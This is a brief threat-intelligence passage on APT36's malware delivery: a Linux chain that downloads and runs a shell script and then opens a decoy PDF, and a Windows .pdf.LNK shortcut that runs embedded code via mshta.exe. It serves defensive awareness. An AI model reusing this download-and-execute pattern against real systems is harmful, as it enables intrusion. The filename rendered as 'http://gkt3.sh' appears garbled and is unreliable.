APT36 has been observed utilizing two distinct methods to execute malware on Linux and Windows platforms, focusing on the distribution of malicious files disguised as legitimate documents. On Linux, the attack begins with the creation of a `.local` directory with specific permissions (0755), followed by downloading three files from a target URL: `gkt3.1`, `http://gkt3.sh`, and `APPL FOR UPDATION.pdf`. The `http://gkt3.sh` script is executed after this download, which subsequently utilizes the `xdg-open` command to open the PDF file, potentially leading to further exploitation or malware execution. Conversely, on Windows platforms, APT36 employs a malicious shortcut (LNK file) named `APPL FOR UPDATION OF NAME BASED & OFFICIAL NIC E-MAIL ID.pdf.LNK`. This file initiates the execution of embedded code through the use of the `mshta.exe` tool, a legitimate Windows system application.